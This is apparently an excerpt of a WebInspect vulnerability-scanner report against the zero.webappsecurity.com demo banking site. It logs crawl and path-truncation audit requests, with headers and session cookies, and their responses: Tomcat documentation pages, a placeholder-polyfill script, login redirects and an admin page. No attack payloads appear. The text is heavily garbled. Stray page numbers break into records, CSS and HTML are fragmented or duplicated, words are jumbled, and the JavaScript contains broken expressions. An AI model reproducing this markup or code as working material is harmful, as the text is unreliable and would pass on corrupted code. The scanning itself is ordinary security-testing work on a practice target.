PSID="2972AA34C8A6AF245A423BC19C9CD9CE"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="55"; smi="0"; sc="1"; ID="4a1bd4fa-cd49-4e66-837e-8b448b07f7aa";
X-Request-Memo: ID="e073da79-b7e8-42ec-9389-f20a64c9afb8"; sc="1"; ThreadId="109";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=B17F0383
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:17 GMT
ETag: W/"1319-1466008838000"
-->
<html>
<head>
</head>
<body>
53
<body>
The JSP Javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/servletapi/
Request:
GET /docs/servletapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/servletapi/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="564F2A0E64C26817838EE110967EF96E";
PSID="9A374CF6133C82D2A83C2624AADBEB16"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="8c384aa4-7d63-40e1-baeb-f27f8d05ff65";
X-Request-Memo: ID="2477b30e-219c-4fe7-a1bb-9e26b2e4e406"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=FF9EF2E4
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:07 GMT
ETag: W/"1323-1466008840000"
-->
<html>
<head>
</head>
<body>
The Servlet Javadoc is not installed by default. Download and install
54

</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/websocketapi/index.html
Request:
GET /docs/websocketapi/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="5BE22692ADEF2CF19E101E8F2AE21ECC";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="8c9ad5e8-9310-4e09-a3da-be5bb8929c4e";
X-Request-Memo: ID="7da23acc-570f-4b66-b0a5-b08d359e7995"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
ETag: W/"1185-1466008840000"
-->
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8" />
</head>
<body>
The WebSocket Javadoc is not installed by default. Download and install
55
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/architecture/index.html
Request:
GET /docs/architecture/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="629E4A1BA8397C370A60A994699A4485";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4c216e81-685e-4aac-878e-79af3584075a";
X-Request-Memo: ID="13cc48eb-9f89-48aa-a925-efa249ba4019"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:54 GMT
ETag: W/"7656-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7
Architecture (7.0.70) - Table of Contents</title><meta name="author" content="Yoav Shapira"><style type="text/css"
media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border:
1px solid
#999;
border-radius:
5px;
56
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
The Apache Tomcat Servlet/JSP Container
href="index.html">Architecture Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Contents</strong></p><ul><li><a
href="index.html">Contents</a></li><li><a href="overview.html">Overview</a></li><li><a href="startup.html">Server
Startup</a></li><li><a href="requestProcess.html">Request Process</a></li></ul></td><td
width="80%" valign="top" align="left" id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0"
cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff" face="arial,helvetica.sanserif"><a
name="Preface"><strong>Preface</strong></a></font></td></tr><tr><td><blockquote>
<p>This section of the Tomc
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/appdev/
Request:
GET /docs/appdev/ HTTP/1.1
Accept: */*
Pragma:
no-cache
57
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="67BA648D12849829BE2910DD0EB52792";
PSID="16A0FCA95F27748B361F869AE08E40BF"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="5d5ef683-f82b-45d1-b014-8c6cbd824fa4";
X-Request-Memo: ID="f1eb2a48-1381-489c-b321-d295c5ae7b6c"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=943C3A6B
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:58:19 GMT
ETag: W/"8650-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Application Developer's
Guide (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
58
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="index.html">App Dev Guide Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="index.html">Contents</a></li><li><a href="introduction.html">Introduction</a></li><li><a
href="installation.html">Installation</a></li><li><a href="deployment.html">Deployment</a></li><li><a
href="source.html">Source Code</a></li><li><a href="processes.html">Processes</a></li><li><a href="sample/">Example
App</a></li></ul></td><td width="80%" valign="top" align="left"
id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font color="#ffffff"
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/
Request:
GET /docs/config/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/config/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="4F45282CDA6F3C357915B50276DEDC05";
PSID="7E09004C87348100F227487435CD3213"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
SmartMode="NonServerSpecificOnly";
ThreadId="88";
sid="39"; smi="0";
sc="1"; ThreadType="AuditorStateRequestorPool";
ID="2d26bf82-99a6-4e3b-a0ef-717f11f60dd6";
59
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="2d26bf82-99a6-4e3b-a0ef-717f11f60dd6";

X-Request-Memo: ID="0d59271e-0338-4447-b9d4-b1158fac3334"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:12 GMT
ETag: W/"11131-1466008846000"
Configuration Reference (7.0.70) - Overview</title><meta name="author" content="Craig R. McClanahan"><style
type="text/css" media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
table.defaultTable
tr:nth-child(even),
table.detail-table tr:nth-child(even) {
background-color:
#FAFBFF;
60
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="index.html">Config Ref. Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Top Level Elements</strong></p><ul><li><a
href="server.html">Server</a></li><li><a
href="service.html">Service</a></li></ul><p><strong>Executors</strong></p><ul><li><a
href="executor.html">Executor</a></li></ul><p><strong>Connectors</strong></p><ul><li><a
href="http.html">HTTP</a></li><li><a
href="ajp.html">AJP</a></li></ul><p><strong>Containers</strong></p><ul><li><a
href="context.html">Context</a></li><li><a href="engine.html">Engine</a></li><li><a
href="host.html">Host</a></li><li><a href="cluster.html">Cluster</a></li></ul><p><strong>Nested
Components</strong></p><ul
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/search.html?searchTerm=12345
Request:
GET /search.html?searchTerm=12345 HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="4FB1E28C3A3C661502F583F3EA8F6277";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="Form"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="action"; Format="Relative";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="47285469-80aa-457f-b7a7-463caf37d211";
X-Request-Memo: ID="7c5328cd-1699-4712-b23e-8d196c922a1c"; sc="1"; ThreadId="98";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:12 GMT
Server:
Apache-Coyote/1.1 *
61
<!DOCTYPE html>
<html lang="en">
<head>
<title>Zero - Search Tips</title>
Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
<div>
</form>
</li>
<li>
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
$(function() {
var path = "/";
});
});
</script>
62
<div class="row">
<ul id="pages-nav">
</ul>
</div>
</div>
$(function () {
var path = "/";
};
} else {
}
});
}
$("
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/resources/js/placeholders.min.js
Request:
GET /resources/js/placeholders.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
X-AscRawUrl: /resources/js/placeholders.min.js
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="511D6DB521E43A071D015EA7E62869D3";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="ScriptInclude"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="216"; ThreadType="JScriptEvent";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b3b66bc-ee7e-418f-a2ff-72824c2c8770";
X-Request-Memo: ID="ba10ebcc-36c7-4b8b-a7d2-a65d07b35ed5"; sc="1"; ThreadId="216";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:31 GMT
ETag: W/"5615-1360116138000"
Last-Modified: Wed, 06 Feb 2013 02:02:18 GMT
Cache-Control: max-age=2678400
Expires: Thu, 10 Nov 2016 07:50:31 GMT
Content-Type: application/javascript;charset=UTF-8
Keep-Alive:
Connection: timeout=5,
Keep-Alive max=100
63
var Placeholders=function(){var validTypes=["text","search","url","tel","email","password","number","textarea"],settings=
{live:false,hideOnFocus:false,className:"placeholderspolyfill",textColor:"#999",styleImportant:true},badKeys=
[37,38,39,40],interval,valueKeyDown,classNameRegExp=new RegExp("\\b"+settings.className+"\\b");function cursorToStart
(elem){var range;if(elem.createTextRange){range=elem.createTextRange();range.move("character",0);range.select()}else if
(elem.selectionStart){elem.focus();
elem.setSelectionRange(0,0)}}function focusHandler(){var type;if(this.value===this.getAttribute("placeholder"))if(!
settings.hideOnFocus)cursorToStart(this);else{this.className=this.className.replace
(classNameRegExp,"");this.value="";type=this.getAttribute("data-placeholdertype");if(type)this.type=type}}function blurHandler()
{var type;if(this.value===""){this.className=this.className+" "+settings.className;this.value=this.getAttribute
("placeholder");type=this.getAttribute("data-placeholdertype");if(type)this.type=
"text"}function submitHandler(){var inputs=this.getElementsByTagName
("input"),textareas=this.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,element,placeholder,i;for(i=0;i<num;i+=1)
{element=i<numInputs?inputs[i]:textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if
(element.value===placeholder)element.value=""}}function keydownHandler(event)
{valueKeyDown=this.value;return!(valueKeyDown===this.getAttribute("placeholder")&&badKeys.indexOf
(event.keyCode)>
-1)}function keyupHandler(){var type;if(this.value!==valueKeyDown){this.className=this.className.replace
(classNameRegExp,"");this.value=this.value.replace(this.getAttribute("placeholder"),"");type=this.getAttribute
("data-placeholdertype");if(type)this.type=type}if(this.value===""){blurHandler.call(this);cursorToStart(this)}}
function addEventListener(element,event,fn){if(element.addEventListener)return element.addEventListener
(event,fn.bind(element),false);if(element.attachEvent)return element.attachEvent("on"+
event,fn.bind(element))}function addEventListeners(element){if(!settings.hideOnFocus){addEventListener
(element,"keydown",keydownHandler);addEventListener(element,"keyup",keyupHandler)}addEventListener
(element,"focus",focusHandler);addEventListener(element,"blur",blurHandler)}function updatePlaceholders(){var
inputs=document.getElementsByTagName("input"),textareas=document.getElementsByTagName
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,form,element,oldPlaceholder,newPlaceho
lder;
for(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:textareas[inumInputs];newPlaceholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.type)>-1)if
(newPlaceholder){oldPlaceholder=element.getAttribute("data-currentplaceholder");if(newPlaceholder!
==oldPlaceholder){if(element.value===oldPlaceholder||element.value===newPlaceholder||!element.value)
{element.value=newPlaceholder;element.className=element.className+" "+settings.className}if(!
oldPlaceholder){if(element.form){form=element.form;
if(!form.getAttribute("data-placeholdersubmit")){addEventListener
(form,"submit",submitHandler);form.setAttribute("data-placeholdersubmit","true")}}addEventListeners(element)}
element.setAttribute("data-currentplaceholder",newPlaceholder)}}}}function createPlaceholders(){var
("textarea"),numInputs=inputs.length,num=numInputs+textareas.length,i,element,form,placeholder;for
(i=0;i<num;i+=1){element=i<numInputs?inputs[i]:
textareas[i-numInputs];placeholder=element.getAttribute("placeholder");if(validTypes.indexOf(element.typ
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/config/index.html
Request:
GET /docs/config/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="7E09004C87348100F227487435CD3213";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="4b07bdfd-5bf9-4978-ba7e-148d40b25b6c";
X-Request-Memo: ID="14650510-0176-4a7f-b96f-425b7b8c369e"; sc="2"; ThreadId="96";
64
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:46 GMT
ETag: W/"11131-1466008846000"
Configuration Reference (7.0.70) - Overview</title><meta name="author" content="Craig R. McClanahan"><style
type="text/css" media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
}
table.defaultTable
tr:nth-child(odd),
table.detail-table tr:nth-child(odd) {
background-color:
#EEEFFF;
65
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="index.html">Config Ref. Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Top Level Elements</strong></p><ul><li><a
href="server.html">Server</a></li><li><a
href="service.html">Service</a></li></ul><p><strong>Executors</strong></p><ul><li><a
href="executor.html">Executor</a></li></ul><p><strong>Connectors</strong></p><ul><li><a
href="http.html">HTTP</a></li><li><a
href="ajp.html">AJP</a></li></ul><p><strong>Containers</strong></p><ul><li><a
href="context.html">Context</a></li><li><a href="engine.html">Engine</a></li><li><a
href="host.html">Host</a></li><li><a href="cluster.html">Cluster</a></li></ul><p><strong>Nested
Components</strong></p><u
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/bank/pay-bills.html
Request:
GET /bank/pay-bills.html HTTP/1.1
Referer: http://zero.webappsecurity.com/online-banking.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="6F2723FE7C386DE06B46E4BC6F7523CF";
PSID="0961B4C9AB7ECE8F80F1EFC03677941C"; SessionType="Crawl"; CrawlType="Script"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b08a0f65-527f-45d2-8a1d-04fd87389665";
X-Request-Memo: ID="908d55a2-13fb-402e-82cb-57de93725b0b"; sc="1"; ThreadId="100";
Response:
HTTP/1.1 302 Found
Date: Mon, 10 Oct 2016 07:52:10 GMT
Location: http://zero.webappsecurity.com/login.html
Content-Length: 0
Keep-Alive:
Connection: timeout=5,
Keep-Alive max=97
66
Page:
http://zero.webappsecurity.com:80/docs/elapi/index.html
Request:
GET /docs/elapi/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="82703ED3FF1FE7EB55F9833C68BD9964";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="0fcd3620-a2c9-48a7-b968-fb3e787d1d35";
X-Request-Memo: ID="656814d0-5378-4f75-aba7-8f22aebff102"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:48 GMT
ETag: W/"1318-1466008838000"
-->
<html>
<head>
</head>
<body>
The EL Javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/appdev/index.html
67
Page:
http://zero.webappsecurity.com:80/docs/appdev/index.html
Request:
GET /docs/appdev/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="16A0FCA95F27748B361F869AE08E40BF";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="9c8f336d-6c16-4d36-bf1f-618d5455d3d8";
X-Request-Memo: ID="3e48b6e2-1371-49be-b865-795260454474"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:13 GMT
ETag: W/"8650-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Application Developer's
Guide (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
68
width: min-content;
*/
}
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="index.html">App Dev Guide Home</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="index.html">Contents</a></li><li><a href="introduction.html">Introduction</a></li><li><a
href="installation.html">Installation</a></li><li><a href="deployment.html">Deployment</a></li><li><a
href="source.html">Source Code</a></li><li><a href="processes.html">Processes</a></li><li><a href="sample/">Example
App</a></li></ul></td><td width="80%" valign="top" align="left"
id="mainBody"><h1>Table of Contents</h1><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font color="#ffffff"
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/bank/
Request:
GET /bank/ HTTP/1.1
Accept: */*
Pragma: no-cache
Connection:
Keep-Alive
X-WIPP:
69
X-Scan-Memo: Category="Crawl"; SID="1AE4F834C44267FDE0DE9117CE4C5278";
PSID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; Format="Relative"; LinkKind="HyperLink";
Locations="Unspecified"; Source="LegacyStaticParser"; ThreadId="280"; ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1af0b217-7635-47a2-9805-a91973caae93";
X-Request-Memo: ID="a4a8bcd1-1410-44e0-8907-82e278d28a39"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 302 Found
Date: Mon, 10 Oct 2016 07:51:26 GMT
Location: http://zero.webappsecurity.com/login.html
Content-Length: 0
Set-Cookie: JSESSIONID=238461F5; Path=/; HttpOnly
Page:
http://zero.webappsecurity.com:80/docs/api/index.html
Request:
GET /docs/api/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="1B53504FE25C2CF2D3F3EE454E68D7B2";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="6b5d1aa8-fc58-4652-bc36-0d5a97c93427";
X-Request-Memo: ID="71ce604a-88a5-4466-bfb8-7fc7b99531b1"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:45 GMT
ETag: W/"1329-1466008838000"
See the License
specific language governing permissions and
limitations
underfor
thethe
License.
70

-->
<html>
<head>
</head>
<body>
Tomcat's internal javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/elapi/
Request:
GET /docs/elapi/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/elapi/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="2CE1DE53F4CF1FCA566114FDBCED92D5";
PSID="82703ED3FF1FE7EB55F9833C68BD9964"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="41"; smi="0"; sc="1"; ID="bf46b1a5-adb3-4c22-8f66-5315cd71801d";
X-Request-Memo: ID="5791b282-c979-4703-b77b-6a50e9f2cad0"; sc="1"; ThreadId="102";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=EBAB640A
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:28 GMT
ETag: W/"1318-1466008838000"
-->
<html>
<head>
71
<head>
</head>
<body>
The EL Javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/funcspecs/
Request:
GET /docs/funcspecs/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/funcspecs/index.html
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Audit.Attack"; SID="2FBA2CE566E4171CB0A43BE111367406";
PSID="9ED4F10AC6184B9298A6A51C297C202A"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="39"; smi="0"; sc="1"; ID="c129735e-bc54-496b-9d57-d97a2ebc7697";
X-Request-Memo: ID="472e2d08-dcff-4ae1-92a7-c60c5cfdd5f1"; sc="1"; ThreadId="101";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:57 GMT
ETag: W/"8461-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Catalina Functional
Specifications (7.0.70) - Table of Contents</title><meta name="author" content="Craig R. McClanahan"><style type="text/css"
media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}
72

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius: 5px;
/*
width: min-content;
*/
}
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
Catalina Functional Specifications
href="index.html">Functional Specs</a></li><li><a href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a
href="#comments_section">User Comments</a></li></ul><p><strong>Administrative Apps</strong></p><ul><li><a
href="fs-admin-apps.html">Overall Requirements</a></li><li><a href="mbean-names.html">Tomcat MBean
Names</a></li><li><a href="fs-admin-objects.html">Administered Objects</a></li><li><a href="fs-adminopers.html">Supported Operations</a></li></ul><p><strong>Internal Servlets</strong></p><ul><li><a href="fsdefault.html">Default Servlet</a></li></ul><p><strong>Realm Implementations</strong></p><ul><li><a href="fs-jdbcrealm.html">JDBC Realm</a></li><li><a href="fs-jndi-realm.html">JNDI Realm</a></li><li><a href="fs-memory-realm.h
73
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/manager-howto.html
Request:
GET /docs/manager-howto.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="112FD5EEB1B0EC04177727EFB7E63F42";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed87c790-51f7-4bb6-9c73-d612e6966286";
X-Request-Memo: ID="fd6d5ffc-7fab-4458-b31d-4099a01505a6"; sc="1"; ThreadId="96";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
ETag: W/"81539-1466008846000"
<html><head><META http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><title>Apache Tomcat 7 (7.0.70) Manager App HOW-TO</title><meta name="author" content="Craig R. McClanahan"><style type="text/css" media="print">
table {
text-align: left;
}
}
th {
text-align: left;
}

}
div.codeBox {
overflow: auto;
margin: 1em 0;
}
div.codeBox pre {
margin: 0;
padding: 4px;
border-radius:
5px;#eff8ff;
background-color:
74
/*
width: min-content;
*/
}
}

}
}
}
color: #fff;
}
padding: 5px 8px;
}
p.notice {
color: rgb(0, 51, 102);
padding: 0.5em;
}
href="http://tomcat.apache.org/"><img src="./images/tomcat.gif" align="right" alt="
href="http://www.apache.org/"><img src="./images/asf-logo.gif" align="right" alt="Apache Logo"
class="noPrint"><p><strong>Links</strong></p><ul><li><a href="index.html">Docs Home</a></li><li><a
href="http://wiki.apache.org/tomcat/FAQ">FAQ</a></li><li><a href="#comments_section">User
Comments</a></li></ul><p><strong>User Guide</strong></p><ul><li><a href="introduction.html">1)
Introduction</a></li><li><a href="setup.html">2) Setup</a></li><li><a href="appdev/index.html">3) First
webapp</a></li><li><a href="deployer-howto.html">4) Deployer</a></li><li><a href="manager-howto.html">5)
Manager</a></li><li><a href="realm-howto.html">6) Realms and AAA</a></li><li><a href="security-managerhowto.html">7) Security Manager</a></li><li><a href="jndi-resources-howto.html">8) JNDI Resources</a></li><li><a
href="jndi-datasource-examples-howto.html">9) JDBC DataSources</a></li><li><a href="class-loader-howto.html">10)
Classloading</a></li><li><a href="jasper-h
...TRUNCATED...
Page:
http://zero.webappsecurity.com:80/docs/api/
Request:
GET /docs/api/ HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/api/index.html
Accept: */*
Pragma: no-cache
Accept-Encoding:
gzip, deflate
User-Agent:
Mozilla/5.0
(Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
75

X-Scan-Memo: Category="Audit.Attack"; SID="443A8D923F5E1E45D620C89F394F32A7";
PSID="1B53504FE25C2CF2D3F3EE454E68D7B2"; SessionType="PathTruncation"; CrawlType="None"; AttackType="None";
X-RequestManager-Memo: sid="47"; smi="0"; sc="1"; ID="d37af25e-90de-4637-b2cb-7be0413f872a";
X-Request-Memo: ID="cf7103ee-f90b-473e-828d-0c9bed95f904"; sc="1"; ThreadId="105";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=FF9EF2E4
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 08:01:07 GMT
ETag: W/"1329-1466008838000"
-->
<html>
<head>
</head>
<body>
Tomcat's internal javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/docs/jspapi/index.html
Request:
GET /docs/jspapi/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-WIPP:
X-Scan-Memo:
Category="Crawl"; SID="2972AA34C8A6AF245A423BC19C9CD9CE";
76
X-Scan-Memo: Category="Crawl"; SID="2972AA34C8A6AF245A423BC19C9CD9CE";

X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="f472316d-8b83-461d-83c3-aff77399ca65";
X-Request-Memo: ID="5d2e9ecf-c43d-474b-998d-a8dbcd476ae0"; sc="1"; ThreadId="97";
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:47 GMT
ETag: W/"1319-1466008838000"
-->
<html>
<head>
</head>
<body>
The JSP Javadoc is not installed by default. Download and install
</body>
</html>
Page:
http://zero.webappsecurity.com:80/admin/index.html
Request:
GET /admin/index.html HTTP/1.1
Accept: */*
Pragma: no-cache
X-Scan-Memo: Category="Crawl"; SID="0CF01A02A1917FDBDF9FF1C597F1495C";
LinkKind="HyperLink";
Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
77
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="e6f10847-378c-4724-90bc-ac074fc8b5b0";
X-Request-Memo: ID="b4bd0c76-c126-434f-9e68-75ad136db2b2"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=680DCF39
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:27 GMT
<!DOCTYPE html>
<html lang="en">
<head>
<title>Zero - Admin - Home</title>
Placeholders.init({
});
</script>
}
});
</script>
</head>
<body>
<div>
</form>
</li>
<li>
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
78
$(function() {
var path = "/";
});
});
</script>
<div class="row">
<h2 class="board-header">Admin Home</h2>
</div>
</div>
<div class="row">
<div class="span3 well">
<ul class="nav nav-list">
<li class="active"><a href="/admin/index.html">Home</a></li>
<li class="divider"></li>
<li><a href="/admin/users.html">Users</a></li>
<li><a href="/admin/currencies.html">Currencies</a></li>
</ul>
</div>
<div class="span8"></div>
</div>
</div>
</div>
<div class="clearfix push"></div>
</div>
<div class="extra">
<div class="extra-inner">
<div class="row">
<div class="span4">
<ul>
<li><span id="download_webinspect_link">Download WebInspect</span></li>
</ul>
</div>
<div class="span4">
<ul>
